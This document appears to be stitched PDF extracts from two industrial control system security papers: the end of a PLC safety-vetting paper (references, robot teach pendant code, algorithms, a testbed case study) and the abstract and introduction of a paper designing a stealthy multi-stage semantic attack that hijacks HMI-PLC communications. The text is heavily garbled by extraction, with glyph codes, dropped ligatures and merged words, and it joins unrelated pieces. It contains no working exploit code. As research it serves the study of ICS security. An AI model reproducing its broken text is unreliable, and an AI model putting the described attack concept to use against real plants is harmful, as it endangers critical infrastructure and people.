shows that V ETPLC can effectively generate event sequences which automatically lead to hidden safety violations. ACKNOWLEDGMENT We would like to thank anonymous reviewers and our shepherd, Prof. Daphne Yao, for their feedback in nalizing this paper. This research was supported in part by NSF Grant CNS-1544613, CNS-1544901, CNS-1544678 and CNS- 1718952. Any opinions, ndings, and conclusions made in thismaterial are those of the authors and do not necessarily re ectthe views of the funding agency.  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. REFERENCES [1] ABB RAPID Veteran, a few question about FANUC KAREL, https://www.robot-forum.com/robotforum/fanuc-robot-forum/abb-rapid-veteran-a-few-question-about-fanuc-karel/. [2] Antlr, http://www.antlr.org/.[3] Clang: a C language family frontend for LLVM, https://clang.llvm. org/. [4] Cloud9 - Automated Software Testing at Scale, http://cloud9.ep .ch/. [5] Conveyor Belts Optimisation, https://www.standard-industrie.com/ en/wp-content/themes/standardindustrie/img/CONVEYOR BELT OPTIMISATION.pdf. [6] Conveyors and Falling Item Prevention, http://www.cisco-eagle.com/ blog/2015/08/20/conveyors-and-falling-item-prevention/. [7] Cooperation and Control: A Systems Perspective, https: //me.engin.umich.edu/news-events/news/cooperation-and-control- systems-perspective. [8] Ethernet/ip, https://en.wikipedia.org/wiki/EtherNet/IP. [9] Foundations For Conveyor Safety Book, http:// martinengineerings3.s3.amazonaws.com/www.martin-eng.de/download/ FoundationsForConveyorSafetyBook.pdf. [10] IEC 61131-3, https://en.wikipedia.org/wiki/IEC 61131-3. [11] Industrial Control Systems Killed Once And Will Again, Experts Warn, https://www.wired.com/2008/04/industrial-cont/. [12] Industry 4.0, https://en.wikipedia.org/wiki/Industry 4.0. [13] MATIEC - IEC 61131-3 compiler, https://bitbucket.org/mjsousa/ matiec. [14] MATIEC examples, https://github.com/Felipeasg/matiec examples. [15] NuSMV: a new symbolic model checker, http://nusmv.fbk.eu/. [16] OpenPLC Project, http://www.openplcproject.com/. [17] PLC Manufacturer Rankings, http://automationprimer.com/2013/10/ 06/plc-manufacturer-rankings/. [18] Programmable Logic Controller, https://en.wikipedia.org/wiki/ Programmable logic controller. [19] Robot kills worker at V olkswagen plant in Germany, https://www.theguardian.com/world/2015/jul/02/robot-kills-worker- at-volkswagen-plant-in-germany. [20] Structured Text Tutorial to Expand Your PLC Programming Skills, http://www.plcacademy.com/structured-text-tutorial/. [21] UPPAAL Home, http://www.uppaal.org/. [22] ANSI/RIA R15. 06: 2012 Safety Requirements for Industrial Robots and Robot Systems, Ann Arbor: Robotic Industries Association , 2012. [23] M. Abrams and J. Weiss, Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia, https://www.mitre.org/sites/default/ les/pdf/08 1145.pdf. [24] A. Aiken, M. F ahndrich, and Z. Su, Detecting Races in Relay Ladder Logic Programs, in Tools and Algorithms for the Construction and Analysis of Systems , 1998. [25] M. R. Aliabadi, A. A. Kamath, J. Gascon-Samson, and K. Pattabiraman, ARTINALI: Dynamic Invariant Detection for Cyber-physical SystemSecurity, in Proceedings of the 2017 11th Joint Meeting on F oundations of Software Engineering (ESEC/FSE 2017) , Sep 2017. [26] R. Alur and T. A. Henzinger, A Really Temporal Logic, J. ACM , vol. 41, no. 1, Jan. 1994. [27] S. Anand, M. Naik, M. J. Harrold, and H. Yang, Automated Concolic Testing of Smartphone Apps, in Proceedings of the ACM SIGSOFT 20th International Symposium on the F oundations of Software Engineering (FSE 12) , 2012. [28] B. Beckert, M. Ulbrich, B. V ogel-Heuser, and A. Weigl, Regression Veri cation for Programmable Logic Controller Software, in F ormal Methods and Software Engineering , 2015. [29] I. Beschastnikh, Y . Brun, S. Schneider, M. Sloan, and M. D. Ernst, Leveraging Existing Instrumentation to Automatically Infer Invariant-constrained Models, in Proceedings of the 19th ACM SIGSOFT Sym- posium and the 13th European Conference on F oundations of Software Engineering (ESEC/FSE 11) , Sep 2011. [30] S. Biallas, J. Brauer, and S. Kowalewski, Arcade.PLC: A Veri cation Platform for Programmable Logic Controllers, in Proceedings of the 27th IEEE/ACM International Conference on Automated Software En-gineering (ASE 2012) , Sep 2012. [31] G. Canet, S. Couf n, J.-J. Lesage, A. Petit, and P. Schnoebelen, Towards the Automatic Veri cation of PLC Programs Written in Instruction List, in Proceedings of the IEEE International Conference on Systems, Man and Cybernetics , Feb 2000.[32] M. Chai and B.-H. Schlingloff, A Rewriting based Monitoring Algo- rithm for TPTL, vol. 1032, pp. 61 72, Jan 2013. [33] Y . Chen, C. M. Poskitt, and J. Sun, Learning from Mutants: Using Code Mutation to Learn and Monitor Invariants of a Cyber-Physical System, in2018 IEEE Symposium on Security and Privacy (Oakland 18) , May 2018. [34] L. Cheng, K. Tian, and D. D. Yao, Orpheus: Enforcing Cyber-Physical Execution Semantics to Defend Against Data-Oriented Attacks, in Pro- ceedings of the 33rd Annual Computer Security Applications Conference (ACSAC 2017) , Dec 2017. [35] J. Dzinic and C. Yao, Simulation-based Veri cation of PLC Programs Master of Science Thesis in Production Engineering, Master s thesis, Chalmers University of Technology, Sweden, 2013. [36] N. Falliere, L. O. Murchu, and E. Chien, W32.Stuxnet Dossier, https://www.symantec.com/content/en/us/enterprise/media/security response/whitepapers/w32 stuxnet dossier.pdf. [37] G. Fedorko, V . Molnar, D. Marasova, A. Grincova, M. Dovica, J. Zivcak, T. Toth, and N. Husakova, Failure Analysis of Belt Conveyor Damage caused by the Falling Material. Part II: Application of ComputerMetrotomography, Engineering Failure Analysis , vol. 34, pp. 431 442, 2013. [38] Y . Fratantonio, A. Bianchi, W. Robertson, E. Kirda, C. Kruegel, and G. Vigna, TriggerScope: Towards Detecting Logic Bombs in Android Applications, in 2016 IEEE Symposium on Security and Privacy (Oakland) , May 2016. [39] L. Garcia, S. Zonouz, D. Wei, and L. P. de Aguiar, Detecting PLC control corruption via on-device runtime veri cation, in 2016 Resilience Week (RWS) , Aug 2016. [40] A. Ginter, The Top 20 Cyber Attacks Against Industrial Control Systems, https://ics-cert.us-cert.gov/sites/default/ les/ICSJWG- Archive/QNL DEC 17/Waterfall top-20-attacks-article-d2%20- %20Article S508NC.pdf. [41] N. Govil, A. Agrawal, and N. O. Tippenhauer, On Ladder Logic Bombs in Industrial Control Systems, in CyberICPS/SECPRE@ESORICS , Sep 2017. [42] J. F. Groote, S. F. M. van Vlijmen, and J. W. C. Koorn, The Safety Guaranteeing System at Station Hoorn-Kersenboogerd, in Computer Assurance, 1995. COMPASS 95. Systems Integrity, Software Safety and Process Security. Proceedings of the Tenth Annual Conference on , Jun 1995. [43] S. Guo, M. Wu, and C. Wang, Symbolic Execution of Programmable Logic Controller Code, in Proceedings of the 2017 11th Joint Meeting on F oundations of Software Engineering (ESEC/FSE 2017) , Sep 2017. [44] R. Huuck, Semantics and Analysis of Instruction List Programs, Electronic Notes in Theoretical Computer Science , vol. 115, pp. 3 18, 2005. [45] H. Janicke, A. Nicholson, S. Webber, and A. Cau, Runtime-Monitoring for Industrial Control Systems, Electronics , vol. 4, no. 4, pp. 995 1017, dec 2015. [46] C. S. Jensen, M. R. Prasad, and A. M ller, Automated Testing with Targeted Event Sequence Generation, in Proceedings of the 2013 In- ternational Symposium on Software Testing and Analysis (ISSTA 2013) , Jul 2013. [47] I. Kovalenko, M. Saez, K. Barton, and D. Tilbury, SMART: A System- Level Manufacturing and Automation Research Testbed, Smart and Sustainable Manufacturing Systems , vol. 1, no. 1, pp. 232 261, 2017. [48] N. H. Lee and S. D. Cha, Generating Test Sequences Using Symbolic Execution for Event-Driven Real-Time Systems, Microprocessors and Microsystems , vol. 27, pp. 523 531, 2003. [49] R. M. Lee, M. J. Assante, and T. Conway, German Steel Mill Cyber Attack, https://ics.sans.org/media/ICS-CPPE-case-Study-2- German-Steelworks Facility.pdf. [50] R. Lee, M. Assante, and T. Conway, Analysis of the Cyber Attack on the Ukrainian Power Grid, https://www.nerc.com/pa/CI/ESISAC/ Documents/E-ISAC SANS Ukraine DUC 18Mar2016.pdf. [51] G. Li, E. Andreasen, and I. Ghosh, SymJS: Automatic Symbolic Testing of JavaScript Web Applications, in Proceedings of the 22Nd ACM SIGSOFT International Symposium on F oundations of SoftwareEngineering (FSE 2014) , Nov 2014. [52] K. S. Luckow, C. S. P as areanu, and B. Thomsen, Symbolic Execution and Timed Automata Model Checking for Timing Analysis of Java Real- Time Systems, EURASIP Journal on Embedded Systems , vol. 2015, no. 1, Sep 2015.  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. [53] A. Martelli and U. Montanari, Additive AND/OR Graphs, in Proceed- ings of the 3rd International Joint Conference on Arti cial Intelligence (IJCAI 73) , Aug 1973. [54] S. McLaughlin, S. Zonouz, D. Pohly, and P. McDaniel, A Trusted Safety Veri er for Process Controller Code, in Proceedings of the 2014 Network and Distributed System Security Symposium (NDSS 14) , Feb 2014. [55] N. Mirzaei, S. Malek, C. S. P as areanu, N. Esfahani, and R. Mahmood, Testing Android Apps Through Symbolic Execution, SIGSOFT Softw. Eng. Notes , vol. 37, no. 6, pp. 1 5, Nov. 2012. [56] A. Montaqim, Top 14 industrial robot companies and how many robots they have around the world, https://roboticsandautomationnews.com/2015/07/21/top-8-industrial-robot-companies-and-how-many-robots-they-have-around-the-world/812/. [57] J. Nellen, E. Abrah am, and B. Wolters, A CEGAR Tool for the Reach- ability Analysis of PLC-Controlled Plants Using Hybrid Automata, in F ormalisms for Reuse and Systems Integration , 2015. [58] J. Nellen, K. Driessen, M. Neuh au er, E. Abrah am, and B. Wolters, Two CEGAR-based Approaches for the Safety Veri cation of PLC-controlled Plants, Information Systems Frontiers , vol. 18, no. 5, pp. 927 952, Oct. 2016. [59] Occupational Safety and Health Administration, OSHA Instruction PUB 8-1.3 SEP 21, 1987 Of ce of Science and Technology Assess- ment, https://www.osha.gov/enforcement/directives/std-01-12-002. [60] T. Ohmann, M. Herzberg, S. Fiss, A. Halbert, M. Palyart, I. Beschast- nikh, and Y . Brun, Behavioral Resource-aware Model Inference, inProceedings of the 29th ACM/IEEE International Conference on Automated Software Engineering (ASE 14) , Sep 2014. [61] S. Ould Biha, A Formal Semantics of PLC Programs in Coq, in Proceedings of the 2011 IEEE 35th Annual Computer Software andApplications Conference (COMPSAC 11) , Jul 2011. [62] S. C. Park, C. M. Park, G.-N. Wang, J. Kwak, and S. Yeo, PLCStu- dio: Simulation based PLC code veri cation, 2008 Winter Simulation Conference , pp. 222 228, 2008. [63] T. Park and P. I. Barton, Formal Veri cation of Sequence Controllers, Computers & Chemical Engineering , vol. 23, no. 11, pp. 1783 1793, 2000. [64] B. Perelman, The Top 3 Threats to Industrial Control Systems, https: //www.securityweek.com/top-3-threats-industrial-control-systems. [65] J.-M. Roussel and B. Denis, Safety Properties Veri cation of Lad- der Diagram Programs, Journal Europ een des Syst `emes Automatis es (JESA) , vol. 36, no. 7, pp. pp. 905 917, Jun. 2002. [66] P. Saxena, D. Akhawe, S. Hanna, F. Mao, S. McCamant, and D. Song, A Symbolic Execution Framework for JavaScript, in Proceedings of the 2010 IEEE Symposium on Security and Privacy (Oakland 10) , May 2010. [67] Z. Yang, M. Yang, Y . Zhang, G. Gu, P. Ning, and X. S. Wang, AppIntent: Analyzing Sensitive Data Transmission in Android for Privacy Leakage Detection, in Proceedings of the 2013 ACM SIGSAC conference on Computer & Communications Security (CCS 13) ,N o v 2013. [68] H. Zhang, D. D. Yao, N. Ramakrishnan, and Z. Zhang, Causality Reasoning About Network Events for Detecting Stealthy MalwareActivities, Computers and Security , vol. 58, no. C, May 2016. APPENDIX A. Teach Pendant Code of F ANUC Robot Figure 8 presents the robot code implemented using teach pendant language. This program is triggered by a PLC event and can pass a part from CNC machine to conveyor. B. Implementation of Static Analysis We have implemented our static analyses in 7K lines of C++ code and 5K lines of Java code. Particularly, we convert PLC ST code into C programs via MATIEC [13] compiler, and thenleverage Clang [3] to enable our analyses. To analyze teachpendant programs in robot, we build a speci c parser using Antlr [2] and then perform control ow analysis on top of the generated AST.1!Function only when receiving the signal 2IF DI [0: Deliver Part@PLC]=OFF, J M P LBL[3] 3DO[6:Pickup_from_CNC1]=ON 4DO[2:Part_AtConveyor@PLC]=OFF 5CALL GO_HOME_AND_GET_VACUUM_GRIPPER 6!Move to CNC1 7J P[10:ROTARM] 80% FINE 8L P[4:ROTARM2] 250mm/sec FINE 9... 10!Pick up a part from CNC1 11L P[9:CNCSIDE] 100mm/sec FINE 12... 13LBL[1] 14IF DI[7:Pickup_Confirmation]=ON, JMP LBL[2] 15JMP LBL[1] 16LBL[2] 17WAIT .10(sec) 18!Deposit part on conveyor 19L P[10:ROTARM] 550mm/sec FINE 20... 21!Notify that part was dropped on conveyor 22D O[ 2 : Part AtConveyor@PLC]=O N 23WAIT . 5 0 ( s e c ) 24D O[ 2 : Part AtConveyor@PLC]=OFF 25CALL RETURN_VACCUM_GRIPPER_AND_GO_HOME 26DO[6:Pickup_from_CNC1]=OFF 27LBL[3] Fig. 8: Robot Teach Pendant Code for Delivering Parts Note that the conversion from PLC to C code, using MATIEC, follows a standardized (IEC 61131-3) mechanism.We admit that some semantics, such as counters, timers, etc.may not be very precisely translated to C code especiallybecause of the implicit effects caused by PLCs scan cycles.Furthermore, different vendors may introduce unique features,besides standard ones, that cannot be converted using existingtools. To address these limitations, an alternative option is to directly conduct analysis on native PLC code. We intend to work on this as part of future work. However, we argue that our graph construction methods are orthogonal to the underlying program analysis. In fact, other (potentially advanced) analysis techniques can be used to achieve our goal. C. Algorithm to Infer Events From Data Traces. Algorithm 3 depicts our algorithm to infer discrete events from continuous data traces collected from physical ICS testbeds. D. Example of Event Sequence & Implementation Motivating Example Figure 9 depicts how we apply a generated event sequence to exercising PLC code of themotivating example. In this chart, the x-axis represents time (in seconds), which is ranging from Begin-of-Test (BOT) to End-of-Test (EOT), and the y-axis denotes the list of events. The effective duration of each event is illustrated as a thick horizontal line, which begins with an empty circle and endswith a lled circle or a cross. The lled circle means the eventis terminated by its sender, and the cross indicates it is disabled due to PLC logic. The dotted part on a thick line represents the possible range of starting point of an event. For instance, the  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. Algorithm 3 Event Inference 1:procedure INFER EVENTS (DT) 2:ET 3: for DT i DT do 4: ETi 5: {DTv0 i,DTv1 i,...,DTvk i} DIVIDE BYVAR(DT i) 6: for DTvp i {DTv0 i,DTv1 i,...,DTvk i}do 7: {d/prime 0,d/prime1,...d/prime m} DTvp i8: l 0 9: forl<m do 10: ifd/prime l/negationslash=d/prime l+1then 11: e (stated/prime l+1,timed/prime l+1) 12: ETi ETi e 13: end if 14: l l+1 15: end for 16: end for 17: S ORTBYTIME(ETi) 18: ET ET ETi 19: end for 20: end procedure /g10/g14/g19/g19/g17/g26/g31/g12/g17/g21/g25/g22/g24 /g1/g10/g14/g24/g26/g31/g12/g17/g21/g25/g22/g24 /g3/g8/g3/g31/g10/g14/g24/g26/g31/g11/g17/g14/g16/g29 /g11/g22/g15/g22/g26/g31/g11/g17/g14/g16/g29 /g1/g10/g14/g24/g26/g31/g1/g26/g3/g22/g21/g27/g17/g29/g22/g24 /g11/g6/g7/g4/g31/g7/g9/g31/g3/g22/g20/g23/g19/g17/g26/g17 /g10/g14/g24/g26/g31/g1/g26/g3/g22/g21/g27/g17/g29/g22/g24 /g13/g18/g20/g17/g5/g9/g13 /g2/g9/g13/g13 /g13/g39/g36/g32/g13/g39/g35 /g13/g39/g33/g37/g13/g39/g34/g32/g28 /g28 /g28 /g32/g30/g37 /g32/g30/g37 /g13/g39/g38 Fig. 9: Generating Event Sequence for Motivating Example starting time of event Part AtConveyor ranges from T+3 toT+39.4seconds due to the variation of robot delivery time, whereTis the time to signal Deliver Part . Similarly, the beginning of RFID IOComplete is fromT+19 toT+20 . This chart shows one permutation of the 7 input events. Since the ve events on the top do not bear any tem-poral dependencies, they can be arranged in any orders,one of which is depicted here. These 5 events are Per- manent ones and are always enabled until programmati- cally disabled (e.g., CNC Part Ready ,Robot Ready and Part AtConveyor ). Then, the starting timestamps of RFID IOComplete and Part AtConveyor are relative to the timestamp Tat which all these ve events have been triggered. We discretize time with being 5 and, in this permutation, we choose to include one discrete version for both of them, RFID IOComplete T+20 and Part - AtConveyor T+10. While RFID IOComplete T+20is a long- lasting event, Part AtConveyor T+10 becomes inactive at (T+ 10) + 0 .5. In consequence, this sequence will trigger the aforementioned error because Part AtConveyor T+10is turned off prematurely. Implementation. We simulate each sequence of events through refreshing values of PLC variables when their cor- responding events occur. We then persist the result values into a le, which is accessed by PLC code at the beginning Fig. 10: Fischertechnik Testbed for Manufacturing System and end of every scan cycle. This is to mimic the input and output phases of a PLC cycle. To re ect the potential event termination originated from PLC logic, we compute a conjunction between each generated event and its currentstate in PLC, and use the result as the new input. For events with certain durations, we set up timers to control their active periods. E. Details of TPTL Grammar The grammar of TPTL is built from proposition symbols and timing constraints by Boolean connective, temporal oper- ators, and freeze quanti ers. The Timing Constraints of TPTL are of the form 1 2 and 1 d 2(time 1is congruent to time 2modulo the constant d). The abbreviations x (fo rx+0 ) ,=, <,>, , true, , , and are de ned as usual. The Temporal Operators can be either 1) next formula/circlecopyrtp that asserts about a timed state sequence that the second state in the sequence satis es the proposition p,o r2 ) until formula p1Up2that asserts about a timed state sequence that there is a state satisfying the proposition p2, and all states before this p2- state satisfy the proposition p1. Additional temporal operators are de ned as usual. In particular, the eventually operator stands for trueU , and the always operator /square stands for . The Freeze Quanti er can be associated to a variable xas x. and it freezes xto the time of the local temporal context. F . Fischertechnik Testbed This testbed is divided into four cells (Cell 1 to Cell 4), each of which is equipped with a conveyor belt and one or twoIR sensors that detect the presence of parts and is controlled by a PLC. The testbed contains two CNC machines (CNC1 and CNC 2) located in Cell 2 and Cell 3 respectively. Two rams (Ram 1 and Ram 2) are deployed to move parts from Cell 1 to Cell 2 and from Cell 3 to Cell 4 respectively. These CNC machines and rams are also controlled by separate PLCs. In this testbed, a PLC is emulated by a Raspberry Pi board running an OpenPLC server to execute PLC code. All Raspberry Pi boards are connected together via Ethernet and linked via Modbus. The system starts when a part enters the manufacturing line from Cell 1 and is passed to Cell 2 by Ram 1 for the operationprocessed by CNC 1. The part is then moved to Cell 3 for the operation processed by CNC 2. When both CNC operations  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. /g6/g8/g6 /g1/g10/g13/g11/g12 /g1/g2/g6/g8/g6/g4/g3 /g7/g21/g20/g12/g14/g22/g22/g26/g9/g23/g11/g21/g23 /g6/g10/g2/g3/g9/g1/g11/g5/g12 /g7/g21/g20/g12/g14/g22/g22/g26/g3/g19/g13 /g6/g10/g4/g8 /g7/g9/g1/g11/g5/g12/g6/g3/g8/g1 /g5/g8/g7/g9/g7/g6/g1/g10/g13/g11/g12 /g2/g6/g2/g28/g26/g7/g21/g20/g12/g14/g22/g22 /g5/g10/g4/g8 /g7/g9/g1/g11/g5/g12/g1/g2/g1/g2/g29/g26/g10/g20/g21/g18/g17/g19/g15 /g5/g10/g4/g8 /g7/g9/g1/g11/g5/g12/g1/g2/g2/g6/g2/g28/g26/g5/g8 /g5/g10/g2/g3/g9/g1/g11/g5/g12/g2/g2/g6/g2/g28/g26/g1/g24/g22/g25 /g5/g10/g2/g3/g9/g1/g11/g5/g12 /g6/g8/g6 /g1/g10/g13/g11/g12 /g1/g2/g6/g8/g6/g5/g3 /g7/g21/g20/g12/g14/g22/g22/g26/g9/g23/g11/g21/g23 /g6/g10/g2/g3/g9/g1/g11/g5/g12 /g7/g21/g20/g12/g14/g22/g22/g26/g3/g19/g13 /g6/g10/g4/g8 /g7/g2/g28/g26/g10/g20/g21/g18/g17/g19/g15 /g5/g10/g4/g8 /g7/g9/g1/g11/g5/g12/g1/g2/g6/g2/g27/g26/g4/g17/g19/g17/g22/g16/g14/g13 /g5/g10/g2/g3/g9/g1/g11/g5/g12 /g2/g29/g26/g10/g20/g21/g18/g17/g19/g15 /g5/g10/g4/g8 /g7/g9/g1/g11/g5/g12/g1 /g2/g6/g2/g28/g26/g4/g17/g19/g17/g22/g16/g14/g13 /g5/g10/g2/g3/g9/g1/g11/g5/g12/g2/g1/g2/g28/g26/g10/g20/g21/g18/g17/g19/g15 /g5/g10/g4/g8 /g7/g9/g1/g11/g5/g12/g1/g2/g6/g2/g27/g26/g7/g21/g20/g12/g14/g22/g22 /g5/g10/g4/g8 /g7/g9/g1/g11/g5/g12/g1/g2/g2/g6/g2/g27/g26/g5/g8 /g5/g10/g2/g3/g9/g1/g11/g5/g12/g2/g2/g6/g2/g27/g26/g1/g24/g22/g25 /g5/g10/g2/g3/g9/g1/g11/g5/g12 /g2/g8/g28/g26/g1/g24/g22/g25 /g5/g10/g2/g3/g9/g1/g11/g5/g12/g6/g2/g8/g1 /g4/g8/g7 Fig. 11: A TECG of Case #7 (CNC-Part Collision) are complete, the part is transferred to the conveyor in Cell 4 by Ram 2 and leaves the testbed. It is possible to place multiple parts on the testbed at the same time and process the parts sequentially. However, due to physical limitations in the testbed (e.g., limited length forthe conveyor belt, long operation time for the rams and CNCmachines), restrictions should be taken into account whendeveloping the control logic. G. Case Study on Scenario #7 CNC-Part Collision Description. This case focuses on the section where a part is processed by CNC 1 and to be transferred to CNC 2. Sincethe testbed has a linear setup, the design and deployment ofthe CNC machines are based upon an assumption: when a CNC nishes an operation and is ready to discharge a part, itssuccessive CNC should also be ready to receive the part this avoids a downgrade in system throughput due to congestion inthe linear model. That is, in this case, CNC 2 is expected to beready (i.e., the preceding part has been discharged from CNC2) when CNC 1 nishes a process and discharges a part. In anormal manufacturing run, CNC 2 sends a signal to PLC whena part is processed. PLC then activates Conveyor 3 to transfer the part from CNC 2 to the next cell (Ram 2). Similarly, when a part is processed by CNC 1, Conveyor 2 and 3 are activatedby PLC to transfer the part from CNC 1 to CNC 2. A potential issue may occur in this linear setup when the aforementioned assumption no longer holds due to changes intime correlation between CNC machines. This could happeneither because of a worn-out component in a CNC that leads to a longer CNC cycle time or a careless change in manufacturing plan (e.g., an operator speeds up the conveyor with a desire for higher production performance). Safety Vetting. Using the proposed analysis method, we rst construct the TECG (as shown in Figure 11) by analyzing the PLC and CNC code. In this case, the correlation between the two CNC machines and PLC can be revealed in this step. From this TECG , we can determine that the event CNC2 - Process is followed by the event CNC2 Finished and the event CNC1 Process is followed by the event CNC1 - Finished . These event dependencies discovered from theinter-device communication help reduce the number of possi- ble permutations from 13700 to 898 (without taking time into account). Then, we proceed to the temporal property miningprocess that produces time correlation and temporal invariantsfor the events. In this case, process times, T CNC 1P rocess and TCNC 2P rocess , from both CNC machines are obtained, which are associated to the time durations for Process Start Process Endof both CNCs. With these time invariants being considered, the number of permutations becomes 6442, 24358and 79818 for V ETPLC-TS EQS-2, V ETPLC-TS EQS-5 and VETPLC-TS EQS-10, respectively. In this case, CNC 1 process time, TCNC 1P rocess , ranges from 3 to 8 seconds and CNC 2 process time, TCNC 2P rocess , ranges from 2 to 7 seconds. As mentioned above, anomaliesmay occur when either CNC 2 takes longer to nish its taskor CNC 1 discharges a part earlier. Under either circumstance,it is possible that the part discharged from CNC 1 arrives inCNC 2 before the precedent part originally in CNC 2 fullyleaves the cell. As a result, the successive part may collide with the preceding part as well as CNC 2 and cause safety issues. This violates the safety speci cation, /square(CNC Busy Part Arrival), that indicates that a part must not arrive at a CNC when it is in a busy state. Through V ETPLC-TS EQS test processes, the system determines that this violation mayoccur when CNC 1 is running at a speed from 3273 rpmto 6000 rpm and CNC 2 is running at a speed from 1714rpm to 2667 rpm with V ETPLC-TS EQS-2. The same violation can also be captured using V ETPLC-TS EQS-5 and V ETPLC- TSEQS-10 with higher precision with respect to the error- triggering speed ranges (see Table IV for details).  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply.
Towards Automated Safety Vetting of PLC Code in Real-World Plants Mu Zhang , Chien-Ying Chen , Bin-Chou Kao , Yassine Qamsane , Yuru Shao , Yikai Lin , Elaine Shi , Sibin Mohan , Kira Barton , James Moyne and Z. Morley Mao Department of Computer Science, Cornell University Department of Computer Science, University of Illinois at Urbana-Champaign Information Trust Institute, University of Illinois at Urbana-Champaign Department of Mechanical Engineering, University of Michigan Department of Electrical Engineering and Computer Science, University of Michigan [email protected], [email protected], {cchen140,sibin }@illinois.edu, [email protected], {yqamsane,bartonkl,moyne }@umich.edu, {yurushao,yklin,zmao }@umich.edu
An_Enhanced_Multi-Stage_Semantic_Attack_Against_Industrial_Control_Systems.pdf
Industrial Control Systems (ICS) play a very important role in national critical infrastructures. However, the growing interaction between the modern ICS and the Internet has made ICS more vulnerable to cyber attacks. In order to protect ICS from malicious attacks, intrusion detection technology emerges. By analyzing the network meta data or the industrial process data, Intrusion Detection Systems (IDS) can identify attacks that violate communication protocols or system speci cations. However, the existing intrusion detection technology is not omnipotent, which opens up a back door for some more advanced attacks. In this work, we design an enhanced multi-stage semantic attack against ICS, which is undetectable by existing IDS. By hijacking the communication channels between the Human Machine Interface (HMI) and the remote Programmable Logic Controllers (PLCs), the attacker can manipulate the measurement data and control instructions simultaneously. The fake measurement data deceives the human operator into making wrong decisions. Furthermore, the attacker can strategically manipulate the semantic meaning of control instructions according to system state transition rules. In the meanwhile, a fake view of measurement data is presented to the HMI to conceal the on-going malicious attack. This attack is totally stealthy since the message sizes and timing, the command sequences, and the system state values are all legitimate. Consequently, this attack can secretly bring the system into critical states. Experimental results have veri ed the strong attack ability of the proposed attack.
SPECIAL SECTION ON DISTRIBUTED COMPUTING INFRASTRUCTURE FOR CYBER-PHYSICAL SYSTEMS Received September 29, 2019, accepted October 21, 2019, date of publication October 25, 2019, date of current version November 7, 2019. Digital Object Identifier 10.1 109/ACCESS.2019.2949645 An Enhanced Multi-Stage Semantic Attack Against Industrial Control Systems YAN HU 1, YUYAN SUN2,3, YOUCHENG WANG 4, AND ZHILIANG WANG1 1School of Computer and Communication Engineering, University of Science and Technology Beijing, Beijing 100083, China 2Beijing Key Laboratory of IoT Information Security, Institute of Information Engineering, Chinese Academy of Sciences, Beijing 100195, China 3School of Cyber Security, University of Chinese Academy of Sciences, Beijing 100195, China 4Science and Technology on Complex System Control and Intelligent Agent Cooperation Laboratory, Beijing Electro-Mechanical Engineering Institute, Beijing 100074, China Corresponding author: Yan Hu ([email protected]) This work was supported in part by the National Natural Science Foundation of China under Grant 61802016 and Grant 61702506, in part by the National Key Research and Development Program of China under Grant 2017YFB0802805, in part by the National Social Science Foundation of China under Grant 17ZDA331, in part by the Project funded by China Postdoctoral Science Foundation under Grant 2018M641198, and in part by the Fundamental Research Funds for the Central Universities under Grant FRF-BD-18-016A. INDEX TERMS Industrial control systems, multi-stage semantic attacks, state transition, stealthy attacks. I. INTRODUCTION Nowadays, Industrial control systems (ICS) [1] play a quite important role in a variety of industrial processes, such as manufacturing, public facilities (e.g., buildings and airports), power generation and distribution [2][4], chemical process- ing [5], water treatment [6], oil and gas transportation [7], or large-scale communication [8]. The rapid development of Internet Technology (IT) facilitates ICS to realize remote process control and intelligent decision making. However, high exposure to open networks has made ICS an attrac- tive target for malicious attackers [9], [10]. The summer of 2010 was a landmark to ICS security. By that time the The associate editor coordinating the review of this manuscript and approving it for publication was Zhen Ling.core control program of the Natanz uranium enrichment base in Iran was infected by an unprecedented sophisticated cyber worm called ``Stuxnet''. The centrifuge for uranium enrichment was forced to accelerate unconventionally and was eventually damaged, which caused a huge loss to the entire nuclear plant. In 2015, the notorious Trojan malware ``BlackEnergy3'' attacked the Ukrainian power grid. False commands sent to relays triggered unconventional circuit dis- connections, immediately followed by a large-scale blackout. At Black Hat 2017 [11], Dr. Staggs pointed out that cyber and physical attacks can invade the programmable automa- tion controllers and OPC (OLE for Process Control) servers easily by exploiting the wind farm design and implementation aws. Additionally, they designed corresponding attack tools to launch attacks on actual wind farms. So many ICS security VOLUME 7, 2019This work is licensed under a Creative Commons Attribution 4.0 License. For more information, see http://creativecommons.org/licenses/by/4.0/156871 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS incidents indicate that ICS security has become a critical global issue [12], [13]. Intrusion Detection Systems (IDS) provide a promising solution for protecting ICS [14], [15]. IDS are a type of software designed to nd indications that information sys- tems have been compromised. Traditional intrusion detec- tion technology is mainly classi ed into two categories, signature-based and anomaly-based. Signature-based IDS, also called misuse-based, build a blacklist containing the sig- natures of known attacks, and raise alarms when the system behavior matches any of these signatures. Anomaly-based IDS are mainly used to detect anomalies that violate the nor- mal behavior patterns of a target system. Therefore, a normal behavior model of the target system should be constructed. Model parameters can be learnt from unaffected system operating data. While applying intrusion detection to ICS, the industrial process data (e.g., measurement data and con- trol instructions) is another important factor to consider [16]. If the value of a process variable is outside its normal range or breaks the fundamental laws of nature, an alarm should be raised. Exiting intrusion detection technology is proved to be useful but not omnipotent. Recently, Kleinmann et al. [17] have proposed a multi-stage semantic attack against ICS. This attacker can drive the target system to a critical state by reversing the semantic meaning of control instructions and presenting a fake view of measurement data to the system operator at the same time. However, the attacker cannot guarantee to realize the attack goal, since it just ran- domly chooses some instructions to reverse. In this work, we design an enhanced and strategic multi-stage semantic attack against ICS, which relies on the system state transition rules to precisely decide which control instructions to reverse. The enhanced semantic attack can signi cantly improve the attack success rate while maintaining its stealthiness. The key contributions of this work are summarized as followsV We analyze the relationships between system states and control instructions, and build a system state transi- tion graph that can accurately characterize the dynamic behavior of ICS. We design an enhanced multi-stage semantic attack against ICS. By exploiting system state transition rules, the attacker can develop accurate attack strate- gies, which can increase the attack success rate signi cantly. We launch the enhanced multi-stage semantic attack on a simulated industrial control system to verify its stronger 